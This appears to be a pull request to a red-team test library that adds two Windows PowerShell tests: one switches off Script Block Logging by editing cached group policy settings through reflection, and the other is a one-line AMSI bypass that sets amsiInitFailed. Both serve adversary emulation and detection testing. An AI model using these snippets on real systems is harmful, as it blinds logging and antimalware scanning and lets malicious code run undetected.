### PR TITLE
T1089 Disable AMSI & Script Block Logging

### DIFF
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -30,6 +30,10 @@
 
 - [Atomic Test #13 - Disable Arbitrary Security Windows Service](#atomic-test-13---disable-arbitrary-security-windows-service)
 
+- [Atomic Test #14 - Disable PowerShell Script Block Logging](#atomic-test-14---disable-powershell-script-block-logging)
+
+- [Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface](#atomic-test-15---powershell-bypass-of-antimalware-scripting-interface)
+
 
 <br/>
 
@@ -310,5 +314,51 @@ sc.exe config #{service_name} start= disabled
 sc.exe config #{service_name} start= auto
 net.exe start #{service_name}
 ```
+
+<br/>
+<br/>
+
+## Atomic Test #14 - Disable PowerShell Script Block Logging
+An adversary may disable PowerShell Script Block Logging to avoid leaving evidence. 
+
+Credit to Matt Graeber (@mattifestation) for the research.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`! 
+```
+$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+```
+
+
+#### Cleanup Commands:
+```
+$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+```
+
+<br/>
+<br/>
+
+## Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface
+An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code. 
+
+Credit to Matt Graeber (@mattifestation) for the research.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`! 
+```
+[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+```
+
+
 
 <br/>

--- a/atomics/T1089/T1089.yaml
+++ b/atomics/T1089/T1089.yaml
@@ -201,3 +201,37 @@ atomic_tests:
     cleanup_command: |
        sc.exe config #{service_name} start= auto
        net.exe start #{service_name}
+
+- name: Disable PowerShell Script Block Logging
+  description: |
+    An adversary may disable PowerShell Script Block Logging to avoid leaving evidence. 
+
+    Credit to Matt Graeber (@mattifestation) for the research.
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+      $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+      $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+      $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+    cleanup_command: |
+      $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+      $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+      $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+      $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+
+- name: PowerShell Bypass of AntiMalware Scripting Interface
+  description: |
+    An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code. 
+
+    Credit to Matt Graeber (@mattifestation) for the research.
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

--- a/atomics/index.md
+++ b/atomics/index.md
@@ -213,6 +213,8 @@
   - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
   - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
   - Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
+  - Atomic Test #14: Disable PowerShell Script Block Logging [windows]
+  - Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -6978,9 +6978,36 @@ defense-evasion:
         command: |
           net.exe stop #{service_name}
           sc.exe config #{service_name} start= disabled
-        cleanup_command: |-
+        cleanup_command: |
           sc.exe config #{service_name} start= auto
           net.exe start #{service_name}
+    - name: Disable PowerShell Script Block Logging
+      description: "An adversary may disable PowerShell Script Block Logging to avoid
+        leaving evidence. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+          $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+          $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+          $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+        cleanup_command: |
+          $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+          $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+          $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+          $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+    - name: PowerShell Bypass of AntiMalware Scripting Interface
+      description: "An adversary may bypass Windows Defender AMSI to execute malicious
+        PowerShell code. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)'
   T1107:
     technique:
       x_mitre_data_sources:

--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -43,6 +43,8 @@
   - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
   - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
   - Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
+  - Atomic Test #14: Disable PowerShell Script Block Logging [windows]
+  - Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)


### PR DESCRIPTION
**Details:**
Tests to disable AMSI and Script Block Logging via PowerShell.

**Testing:**
Tested in Win2012r2

**Associated Issues:**
none